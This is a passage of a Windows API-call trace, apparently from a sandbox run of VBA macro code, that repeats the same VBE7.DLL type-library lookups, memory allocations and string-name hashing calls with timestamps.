This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.465] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.466] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.466] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.466] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.466] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.466] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.466] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.466] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.466] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.466] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.466] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.466] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.466] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.466] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.466] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.466] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.466] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.466] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.466] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.466] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.466] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.466] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.466] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.466] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.466] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.466] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.466] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.466] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.467] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.467] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.467] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.467] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.467] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.467] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.468] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.468] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.468] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.468] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.468] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.468] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.468] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.468] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.468] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.468] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.468] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.468] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.468] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.468] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.468] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.468] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.468] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.468] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.468] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.468] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.468] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.468] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.468] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.469] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.469] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.469] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.469] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.469] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.469] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.469] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.469] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.469] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.469] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.469] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.469] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.469] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.469] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.469] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.469] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.469] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.469] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.469] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.469] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.469] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.469] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.469] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.469] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.469] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.470] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.470] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.470] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.470] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.470] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.470] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.470] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.470] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.470] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.470] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.470] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.470] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.470] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.470] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.470] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.470] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.470] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.470] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.470] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.470] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.470] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.470] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.470] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.470] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.470] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.470] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.470] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.470] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.471] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.471] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.471] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.471] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.471] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.471] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.471] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.471] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.471] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.471] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d848fb0, cb=0xc0) returned 0x1d39d7d2670 [0060.471] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3d40000 [0060.472] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.472] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.472] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.472] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.472] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.472] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.472] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.472] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.472] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.472] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.472] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.472] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.472] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.472] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.472] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.472] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.472] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.472] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.472] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.472] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.472] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.472] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.472] IUnknown:AddRef 